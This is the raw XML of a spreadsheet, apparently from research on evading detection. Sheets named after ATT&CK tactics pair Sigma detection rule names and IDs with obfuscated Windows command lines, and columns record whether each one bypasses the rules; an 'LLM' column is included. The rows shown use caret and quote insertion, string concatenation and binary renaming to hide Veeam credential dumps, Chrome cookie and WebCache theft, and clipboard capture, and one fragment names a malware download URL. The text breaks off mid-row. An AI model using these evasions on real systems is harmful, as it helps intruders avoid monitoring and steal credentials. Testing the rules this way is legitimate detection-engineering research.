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llection" sheetId="1" state="visible" r:id="rId1"/>
    <sheet name="Reconnaissance" sheetId="2" state="visible" r:id="rId2"/>
    <sheet name="Resource Development" sheetId="3" state="visible" r:id="rId3"/>
    <sheet name="Initial Access" sheetId="4" state="visible" r:id="rId4"/>
    <sheet name="Execution" sheetId="5" state="visible" r:id="rId5"/>
    <sheet name="Persistence" sheetId="6" state="visible" r:id="rId6"/>
    <sheet name="Privilege Escalation" sheetId="7" state="visible" r:id="rId7"/>
    <sheet name="Defense Evasion" sheetId="8" state="visible" r:id="rId8"/>
    <sheet name="Discovery" sheetId="9" state="visible" r:id="rId9"/>
    <sheet name="Lateral Movement" sheetId="10" state="visible" r:id="rId10"/>
    <sheet name="Command and Control" sheetId="11" state="visible" r:id="rId11"/>
    <sheet name="Credential Access" sheetId="12" state="visible" r:id="rId12"/>
    <sheet name="Exfiltration" sheetId="13" state="visible" r:id="rId13"/>
    <sheet name="Impact" sheetId="14" state="visible" r:id="rId14"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Collection'!$A$1:$K$954</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'Reconnaissance'!$A$1:$K$996</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'Resource Development'!$A$1:$K$996</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Initial Access'!$A$1:$K$971</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Execution'!$A$1:$K$4796</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'Persistence'!$A$1:$K$884</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'Privilege Escalation'!$A$1:$K$840</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'Defense Evasion'!$A$1:$K$4193</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'Discovery'!$A$1:$K$2001</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="9" hidden="1">'Lateral Movement'!$A$1:$K$959</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="10" hidden="1">'Command and Control'!$A$1:$K$861</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="11" hidden="1">'Credential Access'!$A$1:$K$1954</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="12" hidden="1">'Exfiltration'!$A$1:$K$983</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="13" hidden="1">'Impact'!$A$1:$K$972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Roboto"/>
      <color rgb="FF2C481F"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF434343"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF383A3C"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF423671"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF842E2E"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF2A3243"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF4C535E"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF3E4186"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF6A2723"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF133819"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF3F4170"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF3F4528"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF131D38"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF20444F"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF153137"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Roboto"/>
      <color rgb="FF292E4B"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Calibri"/>
      <b val="1"/>
      <color rgb="FFFFFFFF"/>
    </font>
    <font>
      <name val="Calibri"/>
      <color theme="1"/>
      <u val="single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F4E78"/>
        <bgColor rgb="FF1F4E78"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="8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D9E2F3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pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="2" borderId="2" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0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vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="2" borderId="3" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="2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3" fillId="2" borderId="1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3" fillId="2" borderId="3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19" fillId="2" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="2" borderId="4" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="2" borderId="5" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="5" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="5" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="2" borderId="5" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12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vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="20" fillId="3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bottom" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21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pivotButton="0" quotePrefix="0" xfId="0"/>
    <xf numFmtId="0" fontId="3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0" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16">
    <tableStyle name="Collection-style" pivot="0" count="3">
      <tableStyleElement type="headerRow" dxfId="1"/>
      <tableStyleElement type="firstRowStripe" dxfId="2"/>
      <tableStyleElement type="secondRowStripe" dxfId="3"/>
    </tableStyle>
    <tableStyle name="Reconnaissance-style" pivot="0" count="3">
      <tableStyleElement type="headerRow" dxfId="1"/>
      <tableStyleElement type="firstRowStripe" dxfId="2"/>
      <tableStyleElement type="secondRowStripe" dxfId="3"/>
    </tableStyle>
    <tableStyle name="Resource Development-style" pivot="0" count="3">
      <tableStyleElement type="headerRow" dxfId="1"/>
      <tableStyleElement type="firstRowStripe" dxfId="2"/>
      <tableStyleElement type="secondRowStripe" dxfId="3"/>
    </tableStyle>
    <tableStyle name="Initial Access-style" pivot="0" count="3">
      <tableStyleElement type="headerRow" dxfId="1"/>
      <tableStyleElement type="firstRowStripe" dxfId="2"/>
      <tableStyleElement type="secondRowStripe" dxfId="3"/>
    </tableStyle>
    <tableStyle name="Execution-style" pivot="0" count="3">
      <tableStyleElement type="headerRow" dxfId="1"/>
      <tableStyleElement type="firstRowStripe" dxfId="2"/>
      <tableStyleElement type="secondRowStripe" dxfId="3"/>
    </tableStyle>
    <tableStyle name="Privilege Escalation-style" pivot="0" count="3">
      <tableStyleElement type="headerRow" dxfId="1"/>
      <tableStyleElement type="firstRowStripe" dxfId="2"/>
      <tableStyleElement type="secondRowStripe" dxfId="3"/>
    </tableStyle>
    <tableStyle name="Command and Control-style" pivot="0" count="3">
      <tableStyleElement type="headerRow" dxfId="1"/>
      <tableStyleElement type="firstRowStripe" dxfId="2"/>
      <tableStyleElement type="secondRowStripe" dxfId="3"/>
    </tableStyle>
    <tableStyle name="Credential Access-style" pivot="0" count="3">
      <tableStyleElement type="headerRow" dxfId="1"/>
      <tableStyleElement type="firstRowStripe" dxfId="2"/>
      <tableStyleElement type="secondRowStripe" dxfId="3"/>
    </tableStyle>
    <tableStyle name="Exfiltration-style" pivot="0" count="3">
      <tableStyleElement type="headerRow" dxfId="1"/>
      <tableStyleElement type="firstRowStripe" dxfId="2"/>
      <tableStyleElement type="secondRowStripe" dxfId="3"/>
    </tableStyle>
    <tableStyle name="Impact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K954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Collection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K996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Reconnaissance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K996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Resource Development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K971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Initial Acces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:K5601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Execution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K840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Privilege Escalation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1:K1020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Command and Control-style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A1:K2132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Credential Access-style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A1:K1005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Exfiltration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A1:K972" headerRowCount="1">
  <tableColumns count="10">
    <tableColumn id="1" name="Technical"/>
    <tableColumn id="2" name="Rule_name"/>
    <tableColumn id="3" name="Title"/>
    <tableColumn id="4" name="Rule_id"/>
    <tableColumn id="5" name="Commandline_evasion"/>
    <tableColumn id="6" name="Excutable"/>
    <tableColumn id="7" name="Bypass target rule"/>
    <tableColumn id="8" name="Bypass all rule"/>
    <tableColumn id="9" name="Trigger rule"/>
    <tableColumn id="10" name="LLM"/>
  </tableColumns>
  <tableStyleInfo name="Impac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ftp://192.168.1.100/malware.exe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2" min="1" max="1"/>
    <col width="51.43" customWidth="1" style="42" min="2" max="2"/>
    <col width="36" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="60" customWidth="1" style="42" min="5" max="5"/>
    <col width="18.43" customWidth="1" style="42" min="6" max="6"/>
    <col width="21.71" customWidth="1" style="42" min="7" max="7"/>
    <col width="18.57" customWidth="1" style="42" min="8" max="8"/>
    <col width="18" customWidth="1" style="42" min="9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4" t="inlineStr">
        <is>
          <t>t1005</t>
        </is>
      </c>
      <c r="B2" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_webcache</t>
        </is>
      </c>
      <c r="C2" s="44" t="inlineStr">
        <is>
          <t>Esentutl Steals Browser Information</t>
        </is>
      </c>
      <c r="D2" s="44" t="inlineStr">
        <is>
          <t>6a69f62d-ce75-4b57-8dce-6351eb55b362</t>
        </is>
      </c>
      <c r="E2" s="44" t="inlineStr">
        <is>
          <t>set "flag=/r" &amp;&amp; esentutl.exe %flag% %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat</t>
        </is>
      </c>
      <c r="F2" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3" ht="22.5" customHeight="1" s="42">
      <c r="A3" s="43" t="n"/>
      <c r="B3" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlcmd_veeam_db_recon</t>
        </is>
      </c>
      <c r="C3" s="44" t="inlineStr">
        <is>
          <t>Veeam Backup Database Suspicious Query</t>
        </is>
      </c>
      <c r="D3" s="44" t="inlineStr">
        <is>
          <t>696bfb54-227e-4602-ac5b-30d9d2053312</t>
        </is>
      </c>
      <c r="E3" s="44" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\sqlcmd.exe" C:\Temp\dbquery.exe &amp;&amp; C:\Temp\dbquery.exe -S localhost -d VeeamBackup -Q "SELECT * FROM Credentials"</t>
        </is>
      </c>
      <c r="F3" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" s="42">
      <c r="A4" s="43" t="n"/>
      <c r="B4" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlcmd_veeam_dump</t>
        </is>
      </c>
      <c r="C4" s="44" t="inlineStr">
        <is>
          <t>VeeamBackup Database Credentials Dump Via Sqlcmd.EXE</t>
        </is>
      </c>
      <c r="D4" s="44" t="inlineStr">
        <is>
          <t>b57ba453-b384-4ab9-9f40-1038086b4e53</t>
        </is>
      </c>
      <c r="E4" s="44" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\sqlcmd.exe" C:\Temp\custom_cmd.exe &amp;&amp; C:\Temp\custom_cmd.exe -E -S localhost -Q "SELECT TOP 10 * FROM [VeeamBackup].[dbo].[Credentials]"</t>
        </is>
      </c>
      <c r="F4" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K4" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" s="42">
      <c r="A5" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B5" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C5" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D5" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E5" s="44" t="inlineStr">
        <is>
          <t>C:\ExternalPayloads\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data/Default/Network/Cookies"</t>
        </is>
      </c>
      <c r="F5" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G5" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H5" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I5" s="44" t="n"/>
      <c r="J5" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K5" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" s="42">
      <c r="A6" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B6" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C6" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D6" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E6" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\ExternalPayloads\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data\Default\Network\Cook^ies"</t>
        </is>
      </c>
      <c r="F6" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G6" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H6" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I6" s="44" t="n"/>
      <c r="J6" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K6" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" s="42">
      <c r="A7" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B7" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C7" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D7" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E7" s="44" t="inlineStr">
        <is>
          <t>C:\ExternalPayloads\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data\Default\Network\Cook""ies"</t>
        </is>
      </c>
      <c r="F7" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G7" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H7" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I7" s="44" t="n"/>
      <c r="J7" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K7" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" s="42">
      <c r="A8" s="43" t="inlineStr">
        <is>
          <t>t1119</t>
        </is>
      </c>
      <c r="B8" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_automated_collection</t>
        </is>
      </c>
      <c r="C8" s="44" t="inlineStr">
        <is>
          <t>Automated Collection Command Prompt</t>
        </is>
      </c>
      <c r="D8" s="44" t="inlineStr">
        <is>
          <t>f576a613-2392-4067-9d1a-9345fb58d8d1</t>
        </is>
      </c>
      <c r="E8" s="44" t="inlineStr">
        <is>
          <t>findstr.exe /S ".docx" C:\Users\*.*</t>
        </is>
      </c>
      <c r="F8" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G8" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H8" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I8" s="44" t="n"/>
      <c r="J8" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K8" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" s="42">
      <c r="A9" s="43" t="inlineStr">
        <is>
          <t>t1119</t>
        </is>
      </c>
      <c r="B9" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_automated_collection</t>
        </is>
      </c>
      <c r="C9" s="43" t="inlineStr">
        <is>
          <t>Automated Collection Command Prompt</t>
        </is>
      </c>
      <c r="D9" s="43" t="inlineStr">
        <is>
          <t>f576a613-2392-4067-9d1a-9345fb58d8d1</t>
        </is>
      </c>
      <c r="E9" s="43" t="inlineStr">
        <is>
          <t>for /r C:\Users\ %i in (*.doc*) do @echo %i</t>
        </is>
      </c>
      <c r="F9" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G9" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H9" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K9" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="10" ht="22.5" customHeight="1" s="42">
      <c r="A10" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B10" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_automated_collection</t>
        </is>
      </c>
      <c r="C10" s="44" t="inlineStr">
        <is>
          <t>Automated Collection Command Prompt</t>
        </is>
      </c>
      <c r="D10" s="44" t="inlineStr">
        <is>
          <t>f576a613-2392-4067-9d1a-9345fb58d8d1</t>
        </is>
      </c>
      <c r="E10" s="43" t="inlineStr">
        <is>
          <t>findstr.exe /S ".docx" C:\Users\*.*</t>
        </is>
      </c>
      <c r="F10" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G10" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H10" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K10" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" s="42">
      <c r="A11" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B11" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_automated_collection</t>
        </is>
      </c>
      <c r="C11" s="43" t="inlineStr">
        <is>
          <t>Automated Collection Command Prompt</t>
        </is>
      </c>
      <c r="D11" s="43" t="inlineStr">
        <is>
          <t>f576a613-2392-4067-9d1a-9345fb58d8d1</t>
        </is>
      </c>
      <c r="E11" s="43" t="inlineStr">
        <is>
          <t>for /r C:\Users\ %i in (*.doc*) do @echo %i</t>
        </is>
      </c>
      <c r="F11" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G11" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H11" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K11" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" s="42">
      <c r="A12" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B12" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_default_accounts_manipulation</t>
        </is>
      </c>
      <c r="C12" s="43" t="inlineStr">
        <is>
          <t>Suspicious Manipulation Of Default Accounts Via Net.EXE</t>
        </is>
      </c>
      <c r="D12" s="43" t="inlineStr">
        <is>
          <t>5b768e71-86f2-4879-b448-81061cbae951</t>
        </is>
      </c>
      <c r="E12" s="43" t="inlineStr">
        <is>
          <t>net "user" administrator /domain</t>
        </is>
      </c>
      <c r="F12" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G12" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H12" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I12" s="43" t="n"/>
      <c r="J12" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K12" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" s="42">
      <c r="A13" s="43" t="inlineStr">
        <is>
          <t>t1560.001</t>
        </is>
      </c>
      <c r="B13" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_user_default_accounts_manipulation</t>
        </is>
      </c>
      <c r="C13" s="43" t="inlineStr">
        <is>
          <t>Suspicious Manipulation Of Default Accounts Via Net.EXE</t>
        </is>
      </c>
      <c r="D13" s="43" t="inlineStr">
        <is>
          <t>5b768e71-86f2-4879-b448-81061cbae951</t>
        </is>
      </c>
      <c r="E13" s="43" t="inlineStr">
        <is>
          <t>net user "administrator""" /domain</t>
        </is>
      </c>
      <c r="F13" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G13" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H13" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I13" s="43" t="n"/>
      <c r="J13" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K13" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" s="42">
      <c r="A14" s="43" t="inlineStr">
        <is>
          <t>t1123</t>
        </is>
      </c>
      <c r="B14" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_audio_capture</t>
        </is>
      </c>
      <c r="C14" s="43" t="inlineStr">
        <is>
          <t>Audio Capture via PowerShell</t>
        </is>
      </c>
      <c r="D14" s="43" t="inlineStr">
        <is>
          <t>932fb0d8-692b-4b0f-a26e-5643a50fe7d6</t>
        </is>
      </c>
      <c r="E14" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Import-Module AudioDeviceCmdlets; $func = 'Get-AudioDevice'; &amp; $func -List"</t>
        </is>
      </c>
      <c r="F14" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G14" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H14" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I14" s="43" t="n"/>
      <c r="J14" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K14" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" s="42">
      <c r="A15" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B15" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C15" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D15" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E15" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-Clip`board"</t>
        </is>
      </c>
      <c r="F15" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G15" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H15" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I15" s="43" t="n"/>
      <c r="J15" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K15" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" s="42">
      <c r="A16" s="43" t="inlineStr">
        <is>
          <t>t1115</t>
        </is>
      </c>
      <c r="B16" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_get_clipboard</t>
        </is>
      </c>
      <c r="C16" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI</t>
        </is>
      </c>
      <c r="D16" s="43" t="inlineStr">
        <is>
          <t>b9aeac14-2ffd-4ad3-b967-1354a4e628c3</t>
        </is>
      </c>
      <c r="E16" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX ('Get-' + 'Clipboard')"</t>
        </is>
      </c>
      <c r="F16" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G16" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H16" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I16" s="43" t="n"/>
      <c r="J16" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K16" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" s="42">
      <c r="A17" s="43" t="inlineStr">
        <is>
          <t>t1074.001</t>
        </is>
      </c>
      <c r="B17" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_zip_compress</t>
        </is>
      </c>
      <c r="C17" s="43" t="inlineStr">
        <is>
          <t>Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet</t>
        </is>
      </c>
      <c r="D17" s="43" t="inlineStr">
        <is>
          <t>85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation</t>
        </is>
      </c>
      <c r="E17" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -WindowStyle Hidden -Command Compress-Archive -Path C:\SensitiveData\* -DestinationPath C:\Users\Public\Documents\archive.zip</t>
        </is>
      </c>
      <c r="F17" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G17" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H17" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I17" s="43" t="n"/>
      <c r="J17" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K17" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" s="42">
      <c r="A18" s="43" t="inlineStr">
        <is>
          <t>t1113</t>
        </is>
      </c>
      <c r="B18" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_psr_capture_screenshots</t>
        </is>
      </c>
      <c r="C18" s="43" t="inlineStr">
        <is>
          <t>Screen Capture Activity Via Psr.EXE</t>
        </is>
      </c>
      <c r="D18" s="43" t="inlineStr">
        <is>
          <t>2158f96f-43c2-43cb-952a-ab4580f32382</t>
        </is>
      </c>
      <c r="E18" s="43" t="inlineStr">
        <is>
          <t>psr.exe /sc 1 /output C:\\Users\\Public\\report.zip</t>
        </is>
      </c>
      <c r="F18" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G18" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H18" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I18" s="43" t="n"/>
      <c r="J18" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K18" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" s="42">
      <c r="A19" s="43" t="n"/>
      <c r="B19" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlcmd_veeam_db_recon</t>
        </is>
      </c>
      <c r="C19" s="44" t="inlineStr">
        <is>
          <t>Veeam Backup Database Suspicious Query</t>
        </is>
      </c>
      <c r="D19" s="44" t="inlineStr">
        <is>
          <t>696bfb54-227e-4602-ac5b-30d9d2053312</t>
        </is>
      </c>
      <c r="E19" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-Sqlcmd -Query "SELECT * FROM VeeamBackup.dbo.Credentials" -ServerInstance "localhost"</t>
        </is>
      </c>
      <c r="F19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="43" t="n"/>
      <c r="J19" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" s="42">
      <c r="A20" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B20" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C20" s="44" t="inlineStr">
        <is>
